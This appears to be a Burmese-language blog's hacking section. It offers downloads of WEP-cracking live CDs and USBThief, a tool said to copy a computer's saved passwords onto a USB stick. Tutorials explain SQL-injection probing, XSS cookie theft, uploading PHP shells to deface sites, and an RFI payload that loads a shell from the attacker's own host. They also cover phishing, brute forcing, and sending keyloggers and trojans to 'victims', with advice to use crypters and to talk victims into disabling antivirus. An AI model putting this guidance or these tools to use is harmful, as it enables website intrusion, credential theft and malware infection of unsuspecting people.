Showing posts with label Hacking ကဏ္ဍ။. Show all posts
Showing posts with label Hacking ကဏ္ဍ။. Show all posts

Wednesday, April 11, 2012

Beini Minidwep-gtk <<< Download




wifi password Hacking အတွက် လေ့ကျင့်လို့ ကောင်းတဲ့ Software လေးပါ။
minidwep-gtk ဖြင့် hack ရတာ အလွယ်ကူဆုံးနဲ့ အရိုးရှင်းဆုံးဖြစ်ပါတယ်။ WEP ကိုပဲ hack နိုင်သေးပြီး WPA2-PSK တို့ အတွက်တော့ အဆင်မပြေပါ...။
*** Beini Software ဟာ မိမိကိုယ်ပိုင် wifi password ကို ထိုးဖောက်နိုင်ဖို့ အတွက် လေ့ကျင့်ခန်းအနေနဲ့ ထုတ်လုပ်ခြင်းဖြစ်ပါတယ်။ တခြားသူရဲ့ wifi ကို ထိုးဖောက်ခြင်းမပြုပဲ မိမိကိုယ်ပိုင်ကိုသာ ထိုးဖောက်ရန် အလေးအနက် သတိပေးထားပါတယ်။

............ လေးစားစွာဖြင့် .......

Saturday, January 28, 2012

USBThief <<< Download





USBThief
1.45 MB

USBThief ဆိုတဲ့ Program လေးကတော့ မိမိရဲ့ Data တွေကို ခဏလေးနဲ့ ခိုးယူနီုင်တဲ့ Program လေးပါ။
USB တစ်ချောင်းကို Computer ထဲထိုးလိုက်တာနဲ့ .... အဲ့ဒီ ကွန်ပျူတာမှာ သုံးထားတဲ့ Password မှန်သမျှ...
Browser ကနေ Website များကို ၀င်ထားခဲ့သမျှ User name နဲ့ Password များ အဲ့ဒီ USB Stick ထဲသို့ ရောက်သွားပါလိမ့်မယ်။


Using USBThief VIDEO File Download Link

http://o-o.preferred.cat-bkk1.v7.lscache3.c.youtube.com/videoplayback?sparams=id%2Cexpire%2Cip%2Cipbits%2Citag%2Csource%2Calgorithm%2Cburst%2Cfactor%2Ccp&fexp=906010&algorithm=throttle-factor&itag=34&ip=203.0.0.0&burst=40&sver=3&signature=862A3B2A487223ED19FA9724B5DA502BC0DC013A.ADC950A7DDDA926C47422B8A509351C2388C8CF4&source=youtube&expire=1327787600&key=yt1&ipbits=8&factor=1.25&cp=U0hRTFdTVV9FSkNOMV9PTVlHOmsyVGN2Z01UeTlR&id=c93186406287cf67

Saturday, September 24, 2011

Wifi Slax Wireless Hacking



ဒီကောင်လေးကိုဘာအတွက်သုံးတာလဲဆိုတော့...လေ့လာကြည့်ပေါ့။

်အပိုင်း ( 1 ) ကနေစပြီးတော့ဖြေလိုက်ပါ။ အဲ့ဒါဆိုရင်အထဲမှာ ISO ဖိုင်လေးကျလာပါလိမ့်မယ်။ အဲ့ဒီကောင်လေး ကို Burn လိုက်ယုံပါပဲ။

Traditionally, cracking WEP keys has been a slow and tedious process. The attacker must capture hundreds of thousands or millions of packets? a process that could take hours or even days, depending on the volume of traffic passing through the wireless network. After enough packets were captured, a WEP cracking program such as Aircrack would be used to find the WEP key.

Basic Directions:

1). Boot from cd

2). Getting the WEP key

3). Write

4). Reboot to windows

5). Connect using the WEP key

Create a buddy who want to hacking the login passwords for free hotspotan can, can use this software to get a username and password hacking hotspot pal who want to .... should not be abused this software ok.

Download Link
http://www.mediafire.com/file/987197fyi2hd9t5/WFI.LiveCD.3.1.part1.rar
http://www.mediafire.com/file/rpt3i797rpa17sw/WFI.LiveCD.3.1.part2.rar
http://www.mediafire.com/file/327kr63x5q5x7ie/WFI.LiveCD.3.1.part3.rar
http://www.mediafire.com/file/3kllmoxz27s8lly/WFI.LiveCD.3.1.part4.rar

Thursday, July 7, 2011

Zemana AntiLogger 1.9.2.511 ML + RUS <<< Download




Zemana AntiLogger 1.9.2.511 ML + RUS | 8.49 Mb

Anti-Logger, developed to thwarts attacks from various kinds of malware threats, proactively protects your "Information Security" without needing a signature-based algorithm by using powerful anti-action methods. Anti-Logger prevents attacks from all known forms of malware which are designed to perform information theft. Anti-Logger uses a proactive and unique way to detect potentially harmful applications which have not already been recognized or identified by anti-virus programs. Consequently, it protects your "Information Security" from a wide range of threats. Anti-Logger employs a brand new and powerful protection method against unknown malwares which cannot be caught by well-known and very commonly used security software. To examine closely the superior power of Anti-Logger, and to test the various protection modules, or to understand how your security software protects your system, visit"simulation test program" pages.

Key Features:
- SSL Logger Protection
Prevents theft of data exchanged via secure connections (HTTPS/SSL)
- Key Logger Protection
Prevents all harmful applications from logging your keystrokes(thereby stealing your passwords and account info)
- Screen Logger Protection
Prevents harmful applications from capturing your computer screen.
- WebCam Logger Protection
Prevents any harmful applications from monitoring your Web Camera.
- ClipBoard Logger Protection
Prevents harmful applications from taking snapshots of your clipboard.
- System Defense
Tracks down Windows operating system activity in real-time to prevent detrimental actions from various malware and spyware programs.

Homepage - http://www.zemana.com

Thursday, September 9, 2010

Web Hacking...။

Web hacking နည်းပညာတွေဟာ တစ်ဘက်ကကြည့်ရင်လည်း Website ကို ကာကွယ်ဖို့အတွက် ကူညီပါ လိမ့်မယ်။
(က)SQL Injection
( ခ ) XSS
( ဂ) Shells
(ဃ) RFI ……;
နောက်ထပ်အများကြီး ရှိပါသေးတယ်။

(က) SQL Injection
Website အများစုဟာ SQL Database တစ်ခုနဲ့ connect လုပ်ထားကြပါတယ်။ SQL Databaseက သူတို့ရဲ့ Website သို့ လာရောက်လာပတ်သူက register လုပ်သွားတဲ့အခါ Username နဲ့ Password တွေ (encrypt လုပ်ပြီး)ကို သိမ်းဆည်းထားဖို့အတွက် သူတို့ကို ကူညီပါတယ်။ SQL database က user တစ်ယောက် logs in လုပ်တဲ့ အခါတိုင်းမှာ မေးခွန်းတွေမေးမြန်းတဲ့ အလုပ်ငန်းစဉ်ကို လုပ်ဆောင်ပါတယ်။ ၄င်းတို့ database ဆီသွား ပြီး မှန်ကန်သေချာတဲ့ password ဟုတ်မဟုတ် ကြည့်ပါတယ်။ အကယ်၍ မှန်ကန်တယ်ဆိုရင်တော့ user ကို log in လိုက်ပါတယ်၊ မမှန်ဘူးဆိုရင်တော့ error တစ်ခုကို ပေးပါလိမ့်မယ်။ ဒါကြောင့် အခြေခံဆောင်ရွက်ချက် ကတော့ database မှာရှိတဲ့ internet information ကို အသုံးချဖို့ကြိုးစားပြီး database ထဲမှာရှိတဲ့ database ထဲမှာ မေးခွန်းတစ်ခုကို စစ်ဆေးဖို့ command တစ်ခုကို လိုက်နာဆောင်ရွက်နေခြင်းဖြစ်ပါတယ်။ ဒီနည်းလမ်း ဟာ website ကို hack ဖို့အတွက် နည်းလမ်းတွေထဲမှာ အရှုပ်ထွေး အခက်ခဲဆုံးနည်းလမ်းတစ်ခု ဖြစ်ပါတယ်။
Website မှာ RFI attach လုပ်ဖို့ အားနည်းချက်ရှိလား မရှိလားဆိုတာကို သိချင်ရင် အောက်ပါအတိုင်းပြု လုပ် ပါ...။
အကယ်၍ Site ရဲ့ URL က.... yoursite.com/index.php?id=545
ဖြစ်နေတယ်ဆိုရင် ၄င်းရဲ့ အဆုံးမှာ ( ' ) ကို အောက်မှာ ပြထားသလိုမျိုး ပေါင်းထည့်ပေးပါ...။

yoursite.com/index.php?id=545'

( ခ ) XSS
XSS ကတော့ အချို့ Website တွေကို hack ဖို့အတွက် ကောင်းမွန်တဲ့ အခြားနည်းလမ်းတစ်ခုလို့ ဆိုနိုင်ပါ တယ်။ အချို့ Website/ forum တွေက post ( သို့ ) ဆောင်းပါး တွေထဲမှာ HTML ခွင့်ပြုခဲ့မယ်ဆိုရင် hacker က content ထဲကို အန္တရာယ်ရှိတဲ့ script တွေကို post လုပ်နိုင်ပါတယ်။ ဒါကြောင့် ဘယ်အချိန်မဆို user တစ်ယောက်က page ကိုဖွင့်လိုက်တိုင်း cookieတွေက hacker ဆီကိုပေးပို့ပါလိမ့်မယ်။ ဒီအတွက် သူက user ကဲ့သို့ log in လုပ်နိုင်ပြီး website ကို #$%@# လုပ်ပါတော့တယ်။

( ဂ ) Shells
Shell ဆိုတာကတော့ အန္တရာယ်ရှိတဲ့ .php script ဖြစ်ပါတယ်။ ၄င်းကိုဘယ်လိုလုပ်ရမလဲ ဆိုတော့ avaters, recepie, tricks , feedbacks ကဲ့သို့သော ဘယ်ဖိုင်မဆို upload လုပ်နိုင်တဲ့ website တစ်ခုခုမှာ နေရာတစ်ခု ရှာပါ။ ပြီးရင် သင့်ရဲ့ shell file ကို အဲဒီထဲကို upload လုပ်နိုင်ဖို့ကြိုးစားပါ။ upload ပြီးသွားရင် ၄င်းကို URL bar မှာဖွင့်ပါ။ အဲဒီ Webhosting ရဲ့ FTP account တစ်ခုလုံးကို သင် မြင်ရပါလိမ့်မယ်။ index page ထဲမှာပါ ၀င်သမျှကို သင့်စိတ်ကြိုက် rename/Edit/upload/download ကြိုက်သလိုလုပ်လို့ရပါပြီ။ အခုလိုပြုလုပ်ခြင်းကို deface လို့လည်း ခေါ်ပါတယ်။


(ဃ) RFI
RFI ကလည်း Website တစ်ခုကို deface လုပ်ဖို့အတွက် ကောင်းတဲ့နည်းလမ်းတစ်ခုပဲ ဖြစ်ပါတယ်။ ၄င်းကို shell နဲ့အတူအသုံးပြုရမှာ ဖြစ်ပါတယ်။ ၄င်းကို သင့်ရဲ့ shell ပေါ်မှာ upload လုပ်ပြီးပြီး ဆိုရင် သင့်ကိုအ ထောက်အကူပေးပါလိမ့်မယ်...။

yoursite.com/shell.txt
သင်က RFT သို့ အားနည်းချက်ရှိတဲ့ site တစ်ခုကို ရှာတွေ့ရပါမယ်။ အဲဒီနောက် အောက်မှာပြထားတဲ့ အတိုင်း ပြုလုပ်နိုင်ပါတယ်။

victimssite.com/index.php?page=yousite.com/shell.txt

ဒီဟာက သင့်ကို သင့်သားကောင်ရဲ့ sites FTP ၀င်လမ်း ကို ထပ်ပေးပါလိမ့်မယ်။ shell မှာလိုပဲ သင်ကြိုက် သလို သင့်စိတ်ကြိုက် လုပ်လို့ရပါပြီ။ အကယ်၍သင်ကသင့် website က RFI attach လုပ်ဖို့ အားနည်းချက် ရှိလား မရှိဘူးလားဆိုတာကို စစ်ဆေးချင်ရင် အောက်ပါအတိုင်း လုပ်ပါ...။
အကယ်၍ သင့် site ရဲ့ URL က

yoursite.com/index.php?id=545

ဖြစ်နေခဲ့ရင် ၄င်းရဲ့ အဆုံးမှာ အောက်မှာပြထားတဲ့ အတိုင်း ပေါင်းထည့်ပေးပါ...။

yoursite.com/index.php?id=http://www.google.com
အကယ်၍ သင့် page ထဲမှာ google page ပါဝင်နေမယ်ဆိုရင်တော့ အဲဒီအဓိပ္ပာယ်က RFI သို့ တွဲဆက်ခြင်း မှာ ပျော့ကွက်တစ်ခုဖြစ်ပါတယ်။

Wednesday, September 8, 2010

HACKING INFORMATION

Hacking နဲ့ ဆိုင်တဲ့ အခြေခံအတွေးအခေါ်လေးတွေကို ဖော်ပြထားတာဖြစ်ပါတယ်။ ဒါတွေကို ဘယ်လိုဆင့်ပွား ပြီး အသုံးချရမယ်ဆိုတာကတော့ ကိုယ့်ကိုကိုယ် အားကိုးရပါလိမ့်မယ်။
နောက်ခံအခြေအနေ
Hack တဲ့ နည်းလမ်းတွေကို Windows 98 ဒီဇိုင်းပြုလုပ်ပြီးကတည်းက စတင်ခဲ့တာဖြစ်ပါတယ်။ Hacking ဆို တာ အခြေခံအားဖြင့်တော့ ပျော့ကွက်၊ဟာကွက် ကွင်းဆက်တွေကို ရှာဖွေပြီး ၄င်းတို့ထဲကမှာ အချို့ယိုစိမ့် နိုင် တဲ့ hole တွေကနေ information တွေထွက်လာအောင် ကြိုးစားတာဖြစ်ပြီး၊သင့်အတွက် အရေးပါနိုင်တဲ့ Password များ၊ Credit Card နဲ့သက်ဆိုင်တဲ့ အသေးစိတ်အချက်အလက်များကို ရယူချင် ရယူနိုင်ပါတယ်။ တစ်ခါတစ်ရံမှာတော့ ပုဂ္ဂိုလ်ရေးဆိုင်ရာ တိုက်ခိုက်မှုတွေအတွက် အသုံးပြုကြပါတယ်။

သတိပြုရန်အကြောင်းအရာ
အကြံပေးချင်တာကတော့ ကောင်းမွန်တဲ့ Site တွေကနေ ဆောင်းပါးတွေ၊ ပို့ချချက်တွေကို သေချာဖတ်ရှုလေ့ လာဖို့လိုပါတယ်။ ဒါဟာ Hacking ကို လေ့လာခြင်းမှာ တစ်ခုတည်းသော နည်းလမ်းဖြစ်ပါတယ်။

မိတ်ဆက်
အဓိကကျတဲ့ အချက်တွေကိုပဲ ဖော်ပြပြီး hacking နည်းလမ်း အချို့ကို အကျဉ်းချုပ်ဖေါ်ပြသွားမှာ ဖြစ်ပါတယ်။ Hacking မှာ အခြေခံအားဖြင့် အဓိကကျတဲ့ အပိုင်းနှစ်ပိုင်း ကွဲထွက်နေပါတယ်။ အဲဒါကတော့...
၁။ Email (သို့) User information
၂။ Web based hacking တို့ပဲဖြစ်ပါတယ်။

Email (သို့) User information
ယနေ့အချိန်မှာ အများဆုံးအသုံးပြုနေကျဖြစ်တဲ့၊ Email, Passwords, Credit Card details စတဲ့ user information များကို hack တဲ့အခါ ကျော်ကြားနေတဲ့ နည်းလမ်းတွေကတော့ အောက်ပါအတိုင်း ဖြစ် ပါတယ်။
(က) Phishing
( ခ ) Brute Forcing
( ဂ ) Keylogging
(ဃ) Trojans

(က)Phishing
Phishing ဆိုတာကတော့ ပုံမှန်အားဖြင့်ထူးခြားတဲ့တိုက်ခိုက်မှုတစ်ခုဖြစ်ပါတယ်။ Hacker တွေကအချို့website (သို့) gmail နဲ့ လုံးဝနီးပါးဆင်တူတဲ့ page တစ်ခုကို ဖန်တီးလိုက်ခြင်းဖြစ်ပါတယ်။ အဲ့ဒီ page တွေကို Hacker တွေက သူတို့ရဲ့ ကိုယ်ပိုင် server တွေမှာ upload လုပ်ကြပါတယ်။ အဲဒီနောက် User အသစ်တွေ ဆီကို အဲဒီ link တွေပေးပို့ပါတယ်။ User တွေက အဲဒီ link ကိုဖွင့်လိုက်တဲ့ အခါ User တွေ အနေနဲ့ သူတို့ ရောက်ချင်တဲ့ website (သို့) gmail လို့ထင်ပြီး သူတို့ရဲ့ username နဲ့ password တွေကိုရိုက်ထည့်ပြီး sign in (သို့) submit ကို click လိုက်ပြီဆိုရင်တော့… အဲဒီ user ရဲ့ information တွေကို hacker ကရရှိသွားပါပြီ။ ဒီနည်းလမ်းကို hacking လောကထဲကို ၀င်ရောက်ဖို့ကြိုးစားနေကြတဲ့ လူသစ်တွေကျယ်ကျယ်ပြန့်ပြန့် အသုံးပြု့နေတဲ့နည်းလမ်း တစ်ခုဖြစ်ပါတယ်။ဒီနည်းလမ်းကို အသုံးပြုပြီး အိန္ဒိယမှာ ရှိတဲ့ ICICI bank နဲ့ပတ်သတ်ပြီး ဖြစ်ခဲ့တဲ့သာဓက တစ်ခုရှိပါတယ်။ များစွာသော User info… တွေကို ဒီနည်းလမ်းကို အသုံးပြုပြီး အခိုးခံခဲ့ရတာဖြစ်ပါတယ်။

အားနည်းချက်
လူတော်တော်များများက ဒီနည်းလမ်းကို အသုံးပြုဖို့ကြိုးစားနေဆဲဖြစ်ပါတယ်။ဒါပေမယ့်…ဒီနည်းလမ်းမှာ အား နည်း ချက်တစ်ခုရှိနေပါတယ်။ အဲဒါကတော့ သားကောင်ဟာ Internet နဲ့ပတ်သတ်ပြီး ဗဟုသုတ အနည်း ငယ် ရှိရုံနဲ့ ဒီ Page ဟာ အစစ်မဟုတ်မှန်းသိနိုင်ပါတယ်။ ဘာကြောင့်လဲဆိုတော့ သူက URL ကို ဖတ်ကြည့်မယ် ဒါဆိုရင်မူရင်း website မဟုတ်ဘူးဆိုတာကို နားလည်သွားနိုင်ပါတယ်။

( ခ ) Brute Forcing
Brute Forcer ဆိုတာကတော့ အခြေခံအားဖြင့် cracker လို့ခေါ်ဆိုနိုင်တဲ့ program တစ်ခုဖြစ်ပါတယ်။ အဲဒီ Brute Forcer ထဲမှာသင်က သင် hack ချင်တဲ့ username ကို ထည့်သွင်းရပါမယ်။ ပြီးတော့ notepad file တစ်ခုကိုလည်း password တစ်ခုကဲ့သို့ထည့်သွင်းရမှာဖြစ်ပြီး အဲဒီ notepad ထဲမှာ ရှိသမျှ အားလုံးနီးပါး အင်္ဂ လိပ် ဘာသာစာလုံးတွေ ပါရှိရမှာဖြစ်ပါတယ်။ ၄င်းကဘယ်လိုအလုပ်လုပ်သလဲဆိုတော့ password မှာပါတဲ့ စာလုံးတစ်လုံးစီတိုင်းအတွက် notepad file ထဲမှာ ရှိသမျှ စာလုံးတိုင်းနဲ့ တိုက်ကြည့်ပါတယ်။ အားလုံးတူ ညီ သွားပြီ ဆိုရင်တော့ ပွဲသိမ်းပဲပေါ့။ တစ်ခြား Forum တွေမှာ " huge pass list" ဆိုတဲ့ ခေါင်းစဉ်ကို သတိပြုမိချင် ပြုမိပါလိမ့်မယ်။ ၄င်းတို့က ဘာမှတော့မဟုတ်ပါဘူး။ ဒါပေမယ့် သင့်ရဲ့ bruteforcer ထဲကို ထည့်သွင်းဖို့ password list ဖြစ်ပါတယ်။

အားနည်းချက်
၁။ တစ်ခါတစ်ရံမှာ brute forcing ဟာ အချိန်အလွန်ကြာမြင့်တတ်ပါတယ်။
၂။ ၄င်းဟာ အာမခံချက် မရှိပါဘူး
၃။ ယနေ့အချိန်ကာလမှာဆိုရင် လူတော်တော်များများဟာ alpha-numeric-symbol password တွေရှိနေကြ ပါပြီ။ brute forcer အတွက် detect လုပ်ဖို့ အလွန်ခက်ခဲပါတယ်။
၎။ ကျော်ကြားတဲ့ gmail ကဲ့သို့သော site တွေမှာ ပြုလုပ်ထားတဲ့ ဒီဇိုင်းတစ်ခုကတော့ login လုပ်တဲ့အခါ (၃) ခါထက်ကျော်ပြီး မှားယွင်းနေပြီးဆိုရင် ၄င်းတို့က "image captcha" ကိုထည့်လိုက်တဲ့အတွက် bruteforcer ကိုရပ်သွားစေပါတယ်။

( ဂ ) Keylogging
Keylogger ကတော့ "server" လို့ ခေါ်ဆိုနိုင်တဲ့ File သေးသေးလေးတွေကို ဖန်တီးဖို့အတွက် သင့်ကို ကူညီ ပေးပါလိမ့်မယ်။ သင်က သင့်ရဲ့ server ကို သားကောင် ဆီသို့ ပေးပို့ရမှာဖြစ်ပါတယ်။ သင့်ရဲ့ သားကောင်က အဲဒီအပေါ်မှာ Click လိုက်ရင်တော့ ကိစ္စပြီးပါပြီ။ ဒီနည်းလမ်းဟာ တစ်စုံတစ်ယောက်ကို hack ဖို့အတွက် အ ကောင်းဆုံးနည်းလမ်းတစ်ခု ဖြစ်နိုင်ပါတယ်။ Keylogger ဆိုတာကတော့ သင့်သားကောင်ရဲ့ computer ထဲမှာ သူဟာသူ install လုပ်နိုင်တဲ့ program တစ်ခုဖြစ်ပြီး၊ သင့်သားကောင်က သူ့ရဲ့ keyboard ပေါ်မှာ ရိုက်လိုက် သမျှ keystroke တိုင်းကို မှတ်တမ်းတင်ထားပါတယ်။ ပြီးရင် ၄င်းက မှတ်တမ်းတင်လို့ ရသမျှတွေကို Hacker ဆီသို့ပေးပို့ပါတယ်။ keystroke ( ဆိုလိုတာက FTP, Email , Messengers ) ကို လက်ခံရရှိဖို့ အများကြီးလမ်း ရှိပါတယ်။ ဒီနည်းလမ်း ဟာ သင့်ရဲ့သားကောင်ကို လှည့်စားပြီး သူတို့ရဲ့ Information တွေကို ရယူဖို့အတွက် အကောင်းဆုံးနည်းလမ်း တစ်ခုဖြစ်ပါတယ်။

အားနည်းချက်
၁။ သင့်ရဲ့ သားကောင်က Keylogger ကိုလက်ခံရရှိတဲ့ အခါ သူတို့ရဲ့ antivirus တွေက keylogger ကို အလို အလျှောက် delete လုပ်လိုက်ခြင်းဖြစ်ပါတယ်။ဒါကြောင့် သင်အနေနဲ့ တစ်စုံတစ်ရာ လှည့်ဖြားခြင်း အားဖြင့် antivirus ကို disable လုပ်ဖို့ စည်းရုံးသိမ်းသွင်းရမှာ ဖြစ်ပါတယ်။
၂။ တခါတရံမှာ Keylog တွေကို ပေးပို့နေတဲ့အချိန်မှာ Firewall က Block လုပ်လိုက်ခြင်းများပဲ ဖြစ်ပါတယ်။

အကြံပြုချက် - "crypters" လို့ခေါ်တဲ့ program တွေကို အသုံးပြုဖို့ပါပဲ။ ၄င်းက သင့်ရဲ့ server တွေကို ရှာဖွေမ တွေ့အောင် ပြုလုပ်နိုင်စေဖို့ ကူညီပေးပါလိမ့်မယ်။ ဒါဆိုရင် သင့်သားကောင် ရဲ့ anti-virus တွေက ၄င်းတို့ကို detect မလုပ်နိုင်တော့ပါဘူး။

(ဃ) Trojans
Trojan တွေကတော့ Keylogger တွေရဲ့ ဖခင်နဲ့တူပါတယ်။Trojan တွေက အပေါ်မှာ ဖော်ပြခဲ့တဲ့ Keylogger တွေအတိုင်းပဲ သင့်ဆီကို Keylog တွေပေးပို့ပါတယ်။ ဒါ့အပြင် ၄င်းတို့က သင့်သားကောင်းရဲ့ computer ကို သင် ထိန်းချုပ်မှုရစေပါတယ်။ သင့်သားကောင်ရဲ့ computer မှာ သင့်စိတ်ကြိုက် File တွေကို Edit / Delete/ Upload/ Download လုပ်နိုင်ပါတယ်။ Trojan တွေမှာ Keyboard ကို ကောင်းကောင်း အလုပ်မလုပ်အောင် (Keyboard မှာ ကိုယ်နှိပ်လိုက်တဲ့ စာလုံးကတစ်ခု၊ ပေါ်နေတာကတစ်ခု ပေါ်ချင်တဲ့ စာလုံးလျှောက်ပေါ် နေတာ၊ တခါတလေ Keys တွေကို ရိုက်လို့ရတဲ့ အခါ ရတယ်၊ မရတဲ့အခါလည်းမရဘူး၊ အဲလိုမျိုးတွေပေါ့ )။CD ROM တွေ Eject လုပ်တဲ့ အခါ ထွက်မလာတာ၊ CD ပြန်ထည့်ပေးဖို့အတွက် တောင်းဆိုတာ စသဖြင့် အခြား အခြား သော Feature တွေလည်း ပါဝင်ပါသေးတယ်။

အားနည်းချက်
Keylogger တွေနဲ့ အတူတူပါပဲ။

အကြံပြုချက် - Keylogger မှာ အကြုံပြုခဲ့သလိုပါပဲ crypter တွေသုံးပါ။